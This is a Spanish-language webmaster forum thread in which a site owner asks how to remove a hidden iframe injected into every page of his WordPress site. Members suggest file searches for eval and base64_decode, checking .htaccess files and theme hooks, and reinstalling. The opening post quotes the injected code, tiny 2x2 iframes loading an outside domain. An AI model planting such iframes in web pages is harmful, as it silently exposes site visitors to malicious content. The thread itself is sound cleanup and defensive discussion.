Cómo eliminar código malicioso que aparece en todas las páginas

  • Autor Autor Felipe
  • Fecha de inicio Fecha de inicio

Felipe

Iota
Redactor
Verificación en dos pasos activada
Verificado por Whatsapp
Insertar CODE, HTML o PHP: 
<iframe src="http://visualagesachievement.org/Cruises?8" align="middle" frameborder="no" height="2" scrolling="auto" width="2"></iframe>

<iframe src="http://visualagesachievement.org/Cruises?8" align="middle" frameborder="no" height="2" scrolling="auto" width="2"></iframe>

<iframe src="http://visualagesachievement.org/Cruises?8" align="middle" frameborder="no" height="2" scrolling="auto" width="2"></iframe>

Gente tengo ese codigo malicioso que se refleja en todas las paginas de mi sitio web y esta dando una alerta al ingresar, el problema es que no logro encontrar donde esta incerto este codigo

Acá les dejo unas capturas, la verdad es que ya estoy arto, no logro dar con el codigo y como ven figura el iframe en todas las paginas, ya cambie el theme, pero sigue.



Ayudenme porfis!! :/
 
A mi una vez me paso algo asi y tuve que revisar uno por uno todos los archivos del wordpress, no solo los del tema, el problema lo resolví eliminando el codigo malicioso en todos los archivos "index.php" tanto de wordpress como del tema y de varios plugins.

En tu caso yo reinstalaria wordpress para asi solamente revisar los archivos del tema que vayas a utilizar y eliminando todos los demas temas que tengas instalados.

Espero que te sea de utilidad esta información.

Saludos :encouragement:
 
Una vez tuve un problema parecido al tuyo, por mas que traté no lo encontré. Lo que terminé haciendo fué reinstalar wordpress e instalar el theme y todo limpio. NO sé por donde se te metió el código, quizá algún plugin, (o theme).

El caso es que puede estar en el código dentro de las carpetas muy escondigo. Algunos programadores aquí han de tener mejores experiecias. Sin embargo yo extraería la base de datos y haría una reinstalación de wordpress.

En el area de negocios puedes hacer un hilo solicitando que alguien te lo limpie, claro, tendrías que pagar :witless:
 
habia un archivo htaccess que se habia creado en varios directorios... lo elimine y se borro el iframe, pero como se si no va a volver? Gracias [MENTION=2648]solo[/MENTION] por comentar y ayudarme! 🙂
 
Yo sigo viendo esos codigos en tu sitio en los post estan justo antes de </body>
 
[MENTION=293]Felipe[/MENTION] descarga los files a tu pc y usa algun buscador de textos como el fileseek y busca: eval o base64_decode
alguna de esas cadenas en los files. Sino instalate algun plugin que funcione igual ke el fileseek, que buscan cadenas dentro de los files del WP, hace unos dias un user posteo un plugin para eso.
 
reinstala wp
 
javier29pe dijo:
reinstala wp
Hacer clic para expandir...

ya realice eso. Igual encontre parte del codigo en un archivo htaccess repetido en varios directorios, pero [MENTION=11109]Indignado[/MENTION] me dice que sigue estando el codigo, la web es radiocomplices.cl
 
Felipe dijo:
ya realice eso. Igual encontre parte del codigo en un archivo htaccess repetido en varios directorios, pero [MENTION=11109]Indignado[/MENTION] me dice que sigue estando el codigo, la web es radiocomplices.cl
Hacer clic para expandir...

Yo no veo el code, pero si la alerta de virus, tendrias que enviar un reconcideracion desde google webmaster para aclarar que ya sacaste el virus.

WordPress › AntiVirus « WordPress Plugins
 
En apariencia editor selecciona el archivo footer.php y mira al final del todo justo antes de </body></html>

Haber si esta hay el codigo maligno.
 
Indignado dijo:
En apariencia editor selecciona el archivo footer.php y mira al final del todo justo antes de </body></html>

Haber si esta hay el codigo maligno.
Hacer clic para expandir...

Insertar CODE, HTML o PHP: 
<div class="clear"></div>

<div id="footer">
  <div class="left">&copy;
    <?php the_time('Y'); ?>
    &middot; <a href="<?php bloginfo('siteurl'); ?>">
    <?php bloginfo('name'); ?>
    </a> &middot; <span class="rss"><a href="<?php bloginfo('rss2_url'); ?>" title="Subscribe to Posts feed">Posts</a></span> &middot; <span class="rss" title="Subscribe to Comments feed"><a href="<?php bloginfo('comments_rss2_url'); ?>">Comments</a></span> </div>
  <div class="right"> Designed by <a href="http://www.bestwp.net/">Best WordPress Themes</a> &middot; Powered by <a href="http://www.wordpress.org">WordPress</a> </div>
  <div class="clear"></div>
</div>
<!--end: footer-->

</div>
<!--end: wrapper-->
<?php if(get_theme_mod('track') == 'Yes') { ?>
<!--begin: blog tracking-->
<?php echo stripslashes(get_theme_mod('track_code')); ?>
<!--end: blog tracking-->
<?php } else { ?>
<?php } ?>
<?php wp_footer(); ?>
</body></html>

Ese es el codigo del footer, no veo nada extraño.... 🙁
 
con navegador google y nod 32
 

es ke no es el footer.php es un hook al footer. fijate en functions.php o algun file de esos. sino fijate sino tenes un .htaccess de mas aparte del del /

Usa algun buscador para dentro de los files.
 
Usa la funcion "buscar en archivos" en el software notepad ++ y lo mismo encontrará donde se instaló el codigo :encouragement:
 
Imagino que ya eliminaste el codigo malicioso pero debes mandar el aviso, aqui estan las instrucciones:


Saludos :encouragement:
 
Si, hice eso pero veo que aun tengo el codigo en algunos archivos... 🙁 awwww
 
Aun lo tienes mira en el header lo que tienes.

Insertar CODE, HTML o PHP: 
<script type="text/javascript" src="http://www.radiocomplices.cl/wp-content/themes/freshblog/javascripts/dropdown.js"></script>

Eso te esta colocando el iframe en todas las paginas
 
Que estupido, todo comenzó cuando copie un codigo en mi plantilla para transmitir una radio streaming mediante un reproductor flash, con ese codigo le abrí yo mismo el camino para infectar todos los demas archivos, aw, ahora si!! espero que ahora no haya codigo malicioso!! :/

- - - Actualizado - - -


Así es, reemplace los archivos por los limpios, ademas tuve que reemplazar algunos archivos de wordpress infectados. Gracias, puedes revisar ahora si encuentras el codigo malicioso?

incluso habian algunos plugins infectados... :$
 
Ya no sale el ifame esta limpio.
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

  • Pregunta Pregunta
Cómo eliminar código malicioso de Search Console
Respuestas
9
Visitas
415
BigSeoData
Eliminar Código Malicioso de VPS en Banahosting
Respuestas
5
Visitas
328
piano
P
¿Cómo detectar el código malicioso en mi sitio web?
Respuestas
10
Visitas
2K
Jokers
  • Cerrado
Se solicita Programador para eliminar código malicioso de WordPress
Respuestas
5
Visitas
201
Nanuk
X
Cómo eliminar código al copiar texto de Word a Blogger
Respuestas
5
Visitas
443
xijt
X
Menú
Acceder
Registro